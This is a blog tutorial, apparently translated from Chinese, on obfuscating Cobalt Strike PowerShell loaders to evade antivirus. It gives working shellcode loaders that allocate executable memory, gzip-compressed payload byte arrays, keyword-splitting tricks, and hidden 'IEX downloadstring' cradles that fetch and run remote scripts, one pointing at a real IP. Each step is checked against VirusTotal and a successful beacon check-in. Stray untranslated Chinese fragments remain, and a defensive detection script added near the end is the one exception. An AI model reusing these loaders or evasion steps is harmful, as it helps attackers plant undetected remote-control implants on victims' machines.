Cobalt Strike PowerShell AV evasion

0x01 Generating the PowerShell script

A few days ago I read Y4er's article on AV-evasion ideas; I extended his approach and summarised the method here for everyone's reference. If there are any problems, please correct me.

First, the PowerShell script generated by Cobalt Strike:

[image]
<pre>Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
    Param ($var_module, $var_procedure)     
    $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )

    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

    return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('[shellcode goes here; too long to paste]')

for ($x = 0; $x -lt $var_code.Count; $x++) {
    $var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
    start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
    IEX $DoIt
}
</pre>

Then run the generated PowerShell script directly: Microsoft Defender and 360 both kill it instantly.

[image]

0x02 PowerShell AV evasion

現(xiàn)在把FromBase64String改成FromBase65String承耿,那就解決掉FromBase64String冠骄,直接改成byte數(shù)組。

<pre>$string = ''
$s = [Byte[]]$var_code = [System.Convert]::FromBase64String('[shellcode generated by CS]')
$s |foreach { $string = $string + $_.ToString()+','}</pre>
[image]
[image]

Then type $string to view the converted value; even with the scrollbar dragged to the top you cannot see all of it.

[image]

At this point write the variable out to a file and view it there. Some users will get an error because their permissions are insufficient; just change the path.

<pre>$string > c:\1.txt</pre>
[image]
<pre>Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
    Param ($var_module, $var_procedure)     
    $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )

    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

    return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [Byte[]](paste the "FromBase65String" byte array converted above here)

for ($x = 0; $x -lt $var_code.Count; $x++) {
    $var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
    start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
    IEX $DoIt
}
</pre>

Run it and test whether the beacon checks in; as you can see, there is no problem.

[image]

Next, upload it to VT and check detection: https://www.virustotal.com

[image]

That is still not enough, so keep changing keywords.

<pre>Set-StrictMode -Version 2

$DoIt = @'
function func_b {
    Param ($amodule, $aprocedure)       
    $aunsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.Uns'+'afeN'+'ativeMethods')
    $agpa = $aunsafe_native_methods.GetMethod('GetP'+'rocAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $agpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($aunsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($amodule)))), $aprocedure))
}

function func_a {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $aparameters,
        [Parameter(Position = 1)] [Type] $areturn_type = [Void]
    )

    $atype_b = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('Reflect'+'edDel'+'egate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDeleg'+'ateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $atype_b.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $aparameters).SetImplementationFlags('Runtime, Managed')
    $atype_b.DefineMethod('Inv'+'oke', 'Public, HideBySig, NewSlot, Virtual', $areturn_type, $aparameters).SetImplementationFlags('Runtime, Managed')

    return $atype_b.CreateType()
}

[Byte[]]$acode =  [Byte[]](paste the "FromBase65String" byte array converted above here)

for ($x = 0; $x -lt $acode.Count; $x++) {
    $acode[$x] = $acode[$x] -bxor 35
}

$ava = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_b kernel32.dll VirtualAlloc), (func_a @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$abuffer = $ava.Invoke([IntPtr]::Zero, $acode.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($acode, 0, $abuffer, $acode.length)

$arunme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($abuffer, (func_a @([IntPtr]) ([Void])))
$arunme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
    start-job { param($a) ie`x $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
    i`ex $DoIt
}</pre>

First run it to see whether the edits broke the check-in, then test the evasion.

[image]

It checks in successfully; now test evasion. VT: fully undetected.

[image]

0x03 Generating a fileless PowerShell payload

Generate the fileless-execution PowerShell file

[image]

Open the link http://xxx.xx.xxx.xx:80/a to look at the file contents, and save them.

[image]

Check VT: a whole column of red. If only the stocks I bought looked like this... but I digress.

[image]

Using the method above, change FromBase64String straight into "FromBase65String".

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">[Byte[]]$var_code =  [Byte[]](31,139,8,0,0,0,0,0,0,0,173,87,109,111,162,218,22,254,92,127,5,31,154,168,169,181,40,214,234,220,76,114,20,65,80,160,10,190,247,52,205,6,182,136,34,32,108,4,60,51,255,253,44,80,123,58,119,58,247,78,114,175,9,113,179,89,175,207,126,214,98,161,97,114,175,145,192,54,136,236,153,152,186,159,225,32,180,61,151,170,23,10,183,61,79,36,212,87,234,143,98,97,29,185,6,201,182,179,197,155,133,201,155,31,120,198,27,50,205,0,135,33,245,87,225,102,132,2,180,167,74,183,71,20,188,237,61,51,114,112,133,202,111,50,65,108,70,1,46,223,220,20,110,242,173,200,13,209,26,191,185,136,216,71,252,182,199,100,227,153,33,56,42,189,116,124,191,231,237,145,237,190,126,249,194,70,65,128,93,114,190,175,246,49,233,132,33,222,235,142,141,195,82,153,250,70,205,55,56,192,247,207,250,22,27,132,250,139,186,125,171,246,29,79,71,206,69,44,101,145,177,129,132,58,174,153,61,147,60,3,101,25,84,53,223,177,73,169,248,231,159,197,242,203,125,237,181,202,29,34,228,132,165,162,150,134,4,239,171,166,227)

$s=New-Object IO.MemoryStream(,$var_code);IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();</pre>

Then upload it to VT again and check.

[image]

Not good enough; more changes are needed. First, split the byte array into two segments.

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">[Byte[]]$var_c1 =  [Byte[]](31,139,8,0,0,0,0,0,0,0,173,87,109,111,162,218,22,254,92,127,5,31,154,168,169,181,40,214,234,220,76,114,20,65,80,160,10,190,247,52,205,6,182,136,34,32,108,4,60,51,255,253,44,80,123,58,119,58,247,78,114,175,9,113,179,89,175,207,126,214,98,161,97,114,175,145,192,54,136,236,153,152,186,159,225,32,180,61,151,170,23,10,183,61,79,36,212,87,234,143,98,97,29,185,6,201,182,179,197,155,133,201,155,31,120,198,27,50,205,0,135,33,245,87,225,102,132,2,180,167,74,183,71,20,188,237,61,51,114,112,133,202,111,50,187,110,247,28,92,199,128,115,15,33,42,160,68,249)
[Byte[]]$var_c2 =  [Byte[]](199,96,206,103,88,42,138,174,140,247,128,223,249,30,104,122,187,134,50,195,87,233,75,105,165,87,239,217,125,198,101,214,65,97,88,161,70,17,212,185,81,161,52,140,28,108,86,168,142,27,218,151,71,157,136,120,249,178,248,79,184,114,228,16,219,64,33,185,154,123,45,127,2,233,197,53,235,185,80,49,145,1,189,155,171,100,3,217,135,72,62,122,114,114,79,229,11,250,65,228,238,241,255,241,0,126,112,250,223,161,205,192,203,103,186,119,232,242,128,62,199,171,40,254,81,40,136,107,234,195,126,104,159,224,139,5,31,168,86,206,189,144,160,128,220,111,61,29,62,111,242,247,117,233,22,149,41,145,91,80,183,136,250,78,221,67,122,157,144,169,195,55,78,96,69,217,203,155,58,127,178,125,163,98,100,159,21,191,81,42,54,48,140,220,247,3,79,7,150,98,152,193,50,211,185,145,76,24,246,254,6,195,245,1,82,3,14,0,0)
$var_code=$var_c1+$var_c2

$s=New-Object IO.MemoryStream(,$var_code);IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();</pre>

老規(guī)矩使用命令看看是否影響上線

<pre>powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://0.0.0.0:4545/text.txt'))"</pre>

Note: one thing to watch out for here. I copied the content behind the Cobalt Strike malicious link, saved it as a separate txt, and started a separate HTTP service on the server to serve that txt. You can see the check-in succeeded.

The command in the screenshot differs from the one I wrote above because I used obfuscation to confuse the AV; you can ignore that for now, it is covered later.

[image]

Still not perfect this time, one engine short; in each case it is because the command had no keyword replacement, so now we solve that with obfuscation.

[image]

Check in first, then test detection

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">[Byte[]]$var_c1 =  [Byte[]](31,139,8,0,0,0,0,0,0,0,173,87,109,111,162,218,22,254,92,127,5,31,154,168,169,181,40,214,234,220,76,114,20,65,80,160,10,190,247,52,205,6,182,136,34,32,108,4,60,51,255,253,44,80,123,58,119,58,247,78,114,175,9,113,179,89,175,207,126,214,98,161,97,114,175,145,192,54,136,236,153,152,186,159,225,32,180,61,151,170,23,10,183,61,79,36,212,87,234,143,98,97,29,185,6,201,182,179,197,155,133,201,155,31,120,198,27,50,205,0,135,33,245,87,225,102,132,2,180,167,74,183,71,20,188,237,61,51,114,112,133,202,111,50,65,108,70,1,46,223,220,20,110,242,173,200,13,209,26,191,185,136,216,71,252,182,199,100,227,153,33,56,42,189,116,124,191,231,237,145,237,190,126,249,194,70,65,128,93,114,190,175,246,49,233,132,33,222,235,142,141,195,82,153,250,70,205,55,56,192,247,207,250,22,27,132,250,139,186,125,171,246,29,79,71,206,69,44,101,145,177,129,132,58,174,153,61,147,60,3,101,25,84,53,223,177,73,169,248,231,159,197,242,203,125,237,181,202,29,34,228,132,165,162,150,134,4,239,171,166,227,20,203,212,247,114,230,112,146,250,184,84,148,109,35,240,66,111,77,170,115,219,101,234,213,105,30,1
89,146,7,47,159,99,47,150,47,153,89,62,130,60,126,157,100,102,245,172,83,42,194,114,4,216,116,206,24,22,43,212,75,230,239,229,245,149,250,227,61,26,53,114,137,189,199,85,209,37,56,240,124,13,7,71,219,192,97,85,64,174,233,96,21,175,65,173,24,194,241,185,86,177,12,65,4,152,68,129,75,93,99,1,189,163,183,195,165,91,55,114,156,10,216,125,249,93,187,175,37,5,199,87,112,127,87,169,244,81,9,164,70,36,40,87,46,156,248,29,56,228,156,55,103,115,144,206,79,209,127,32,87,25,126,63,17,172,92,248,94,248,132,170,38,118,176,133,8,126,35,128,239,7,174,22,110,110,94,242,37,134,124,74,35,47,180,115,189,175,20,93,161,100,8,2,17,47,72,179,227,156,4,17,46,191,254,115,62,103,183,87,205,176,242,75,67,181,171,214,69,231,124,60,231,56,190,82,47,51,207,54,95,11,55,229,194,133,61,217,254,155,30,217,142,137,131,236,249,175,171,161,135,215,182,139,123,169,139,246,182,113,37,124,233,179,51,195,107,7,231,120,84,175,98,10,196,89,42,94,30,96,179,119,65,167,152,1,250,242,179,26,183,183,201,187,110,247,28,92,199,128,115,15,33,42,160,68,249)
[Byte[]]$var_c2 =  [Byte[]](199,96,206,103,88,42,138,174,140,247,128,223,249,30,104,122,187,134,50,195,87,233,75,105,165,87,239,217,125,198,101,214,65,97,88,161,70,17,212,185,81,161,52,140,28,108,86,168,142,27,218,151,71,157,136,120,249,178,248,79,184,114,228,16,219,64,33,185,154,123,45,127,2,233,197,53,235,185,80,49,145,1,167,11,48,76,52,31,27,54,114,50,84,42,148,96,155,184,155,106,182,117,13,161,248,41,38,44,114,28,40,57,176,116,132,51,129,157,12,11,141,100,156,9,204,202,191,243,163,92,213,48,17,247,190,131,247,32,157,119,33,222,65,22,244,156,75,69,229,116,67,22,54,139,255,33,236,107,157,156,139,34,195,234,10,210,135,160,129,0,154,227,145,10,53,179,3,2,125,173,88,249,137,120,255,91,120,63,182,152,31,194,100,3,124,57,200,82,94,136,47,221,148,100,229,146,75,26,217,203,229,235,59,150,57,114,1,1,212,248,192,219,119,81,136,155,13,45,111,99,165,34,211,138,14,98,42,111,199,205,160,207,29,121,225,32,112,19,184,142,112,49,7,158,147,164,129,234,119,85,201,224,162,231,145,64,15,214,226,184,144,169,195,55,78,96,69,217,203,155,58,127,178,125,163,98,100,159,21,191,81,42,54,48,140,220,247,3,79,7,150,98,152,193,50,211,185,145,76,24,246,254,6,195,245,1,82,3,14,0,0)
$var_code=$var_c1+$var_c2

$s=New-Object IO.MemoryStream(,$var_code);$a1='IEX (New-Object IO.Strea123'.Replace('123','mRe');$a2='ader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()';IEX($A1+$a2)</pre>

老規(guī)矩邻耕,先上線后查殺。

[image]

Checked in successfully, and nothing flagged it. Perfect

[image]

0x04 Summary

VT is indeed evaded, but during actual execution 360 and Defender still block it (a crash-and-burn moment, don't flame me); obfuscating the execution statement gets past that. I tried it yesterday with no problem, but while writing this article today I found that Defender's AMSI had updated, so there is no screenshot. The purpose of the article is not to hand something over for direct use: on versions that are not the latest, direct use really does work, and against the latest AV the approach here is still usable, it just needs more obfuscation or some encoding added.

0x05 Extension

Below is code obfuscation for the remote-script execution command; sometimes AV blocks the CS-generated one-liner when it is run directly.

Original statement:

<pre>powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://103.232.213.20:45685/text.txt'))"</pre>

Finally we need to obfuscate the code: use Replace to substitute part of the letters of a keyword, combined with splitting the string and recombining it.

For example:

<pre>powershell.exe -nop -w hidden -c "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://0.0.0.0:4545/text.txt'')'.Replace('123','adString');IEX ($c1+$c2)"</pre>

Or

<pre>powershell.exe -nop -w hidden -c "$c1='IEX(New-Object Net.WebClient).123'.Replace('123','Downlo');$c2='adString(''httaaa.213.20:45685/text.txt'')'.Replace('aaa','p://103.232/text.txt');IEX ($c1+$c2)"</pre>

PowerShell language features can also be used to obfuscate code.

Conventional methods:

<pre>cmd.exe /c "powershell -c Write-Host SUCCESS -Fore Green"</pre>
<pre>cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell -"</pre>
<pre>cmd /c "set p1=power&& set p2=shell&& cmd /c echo Write-Host SUCCESS -Fore Green ^|%p1%%p2% -"</pre>

Pipeline input stream:

<pre>cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell IEX $input"</pre>

Using environment variables:

<pre>cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&powershell IEX $env:cmd"</pre>
<pre>cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&cmd /c echo %cmd%|powershell -"</pre>
<pre>cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&powershell IEX ([Environment]::GetEnvironmentVariable('cmd', 'Process'))"</pre>
<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&powershell IEX ((Get-ChildItem/ChildItem/GCI/DIR/LS env:cmd).Value)</pre>

Fetching the parameters from another process:

<pre>cmd /c "title WINDOWS_DEFENDER_UPDATE&&echo IEX (IWR https://7ell.me/power)&& FOR /L %i IN (1,1,1000) DO echo"</pre>
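As an added, defender-side example (not code from the original post or from the referenced articles): a Python scanner that turns the four launch tricks above into detection heuristics and runs them over constructed process-creation records. The field names are assumed to follow Sysmon Event ID 1 (Image, CommandLine, ParentImage, ParentCommandLine); the records, the rule names and the example.invalid URL are constructed for illustration. The split-keyword rule replays cmd.exe's %VAR% expansion so that the scanner matches on the command the final child process actually receives, which a plain substring match on the raw parent command line misses.

```python
"""Detection heuristics for the cmd.exe -> PowerShell launch tricks shown above.

Added example, not code from the original post. Record layout is assumed to
follow Sysmon Event ID 1 fields (Image, CommandLine, ParentImage,
ParentCommandLine); all records below are constructed for illustration.
"""
import re

# `set NAME=VALUE` assignments in a cmd.exe command line (value ends at &, | or ")
SET_RE = re.compile(r'\bset\s+(\w+)=([^&|"]*)', re.IGNORECASE)
# %NAME% references that cmd.exe expands before running the line
VAR_RE = re.compile(r'%(\w+)%')
# download / evaluation cradles that get parked in a cmd.exe command line
CRADLE_RE = re.compile(r'\b(IEX|Invoke-Expression|IWR|Invoke-WebRequest)\b', re.IGNORECASE)
# PowerShell reading its script text back out of an environment variable
ENV_INDIRECT_RE = re.compile(
    r'\$env:|GetEnvironmentVariable|\b(?:Get-ChildItem|gci|dir|ls)\s+env:', re.IGNORECASE)


def _basename(path):
    return path.lower().rsplit('\\', 1)[-1]


def expand_cmd_variables(cmdline):
    """Replay cmd.exe %VAR% expansion using the `set VAR=` assignments on the
    same line, so the detector sees the command the final child receives.
    Unassigned variables are left literal, as interactive cmd.exe leaves them."""
    assigned = {name.lower(): value.strip() for name, value in SET_RE.findall(cmdline)}
    return VAR_RE.sub(lambda m: assigned.get(m.group(1).lower(), m.group(0)), cmdline)


def analyze_event(ev):
    """Return the list of rule names that fire on one process-creation record."""
    findings = []
    image = _basename(ev.get('Image', ''))
    cl = ev.get('CommandLine', '')
    pcl = ev.get('ParentCommandLine', '')

    if image == 'cmd.exe':
        expanded = expand_cmd_variables(cl)
        # keyword absent from the raw line but present once the %VAR% pieces are joined
        if 'powershell' not in cl.lower() and 'powershell' in expanded.lower():
            findings.append('split-keyword: "powershell" assembled from %VAR% pieces')
        # script parked in the console title plus a loop that keeps the process alive
        if (re.search(r'\btitle\s+\S', cl, re.IGNORECASE) and CRADLE_RE.search(cl)
                and re.search(r'\bfor\s+/l\b', cl, re.IGNORECASE)):
            findings.append('payload parked in cmd window title with keep-alive loop')

    if image in ('powershell.exe', 'pwsh.exe'):
        # script text arrives on stdin: `IEX $input` or a bare `-` as the last argument
        if re.search(r'\biex\s+\$input\b', cl, re.IGNORECASE) or re.search(r'\s-\s*$', cl):
            findings.append('script body delivered over stdin')
        # script text arrives through an environment variable the parent cmd.exe just set
        if ENV_INDIRECT_RE.search(cl) and SET_RE.search(pcl):
            findings.append('script body passed through environment variable set by parent cmd.exe')
    return findings


def scan_events(events):
    """Map record Id -> findings for every record that triggers at least one rule."""
    results = {}
    for ev in events:
        hits = analyze_event(ev)
        if hits:
            results[ev['Id']] = hits
    return results


PS_EXE = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
CMD_EXE = r'C:\Windows\System32\cmd.exe'

# Constructed records mirroring the launch patterns on this page; Id 5 is a benign
# scheduled task for contrast. The example.invalid URL is a placeholder.
SAMPLE_EVENTS = [
    {'Id': 1, 'Image': CMD_EXE, 'ParentImage': r'C:\Windows\explorer.exe',
     'ParentCommandLine': 'explorer.exe',
     'CommandLine': 'cmd /c "set p1=power&& set p2=shell&& cmd /c echo Write-Host SUCCESS -Fore Green ^|%p1%%p2% -"'},
    {'Id': 2, 'Image': PS_EXE, 'ParentImage': CMD_EXE,
     'ParentCommandLine': 'cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell IEX $input"',
     'CommandLine': 'powershell IEX $input'},
    {'Id': 3, 'Image': PS_EXE, 'ParentImage': CMD_EXE,
     'ParentCommandLine': 'cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&powershell IEX ([Environment]::GetEnvironmentVariable(\'cmd\', \'Process\'))"',
     'CommandLine': "powershell IEX ([Environment]::GetEnvironmentVariable('cmd', 'Process'))"},
    {'Id': 4, 'Image': CMD_EXE, 'ParentImage': r'C:\Windows\explorer.exe',
     'ParentCommandLine': 'explorer.exe',
     'CommandLine': 'cmd /c "title WINDOWS_DEFENDER_UPDATE&&echo IEX (IWR http://example.invalid/stage)&& FOR /L %i IN (1,1,1000) DO echo"'},
    {'Id': 5, 'Image': PS_EXE, 'ParentImage': r'C:\Windows\System32\svchost.exe',
     'ParentCommandLine': 'svchost.exe -k netsvcs -p -s Schedule',
     'CommandLine': r'powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1'},
]

if __name__ == '__main__':
    for event_id, hits in scan_events(SAMPLE_EVENTS).items():
        print(event_id, '->', '; '.join(hits))
```

Run it directly to print the ids of the records that trip a rule. Command-line heuristics like these complement rather than replace PowerShell script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log), which records the script text itself however it was delivered: the Write-Host or IEX (IWR ...) body shows up there whichever of the indirections above carried it into the process.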

Evasion takes constant trial and error and flexible use of what you have learned: if one round of obfuscation is not enough, obfuscate several more times, and combine it with keyword substitution and similar tricks.

References:

https://y4er.com/post/cobalt-strike-powershell-bypass/

https://www.cnblogs.com/linuxsec/articles/7384582.html

© Copyright belongs to the author. Please contact the author for reprints or content cooperation.